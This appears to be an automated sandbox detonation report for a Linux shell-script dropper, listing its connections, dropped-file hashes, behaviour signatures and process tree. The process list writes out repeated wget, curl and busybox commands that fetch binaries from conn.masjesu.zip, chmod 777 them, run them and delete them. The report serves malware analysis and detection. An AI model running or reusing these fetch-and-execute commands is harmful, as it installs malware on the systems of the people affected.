US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

MD5 e1732e70f015e99d14dff1eeeaec9966
SHA1 c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA256 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA512 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

MD5 546071c6a6aeff34580b4d1a9b35a7c3
SHA1 dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA256 2d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512 207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 02:20

Reported

2024-10-28 02:23

Platform

debian9-mipsel-20240611-en

Max time kernel

90s

Max time network

119s

Command Line

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A

Processes

/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/wget

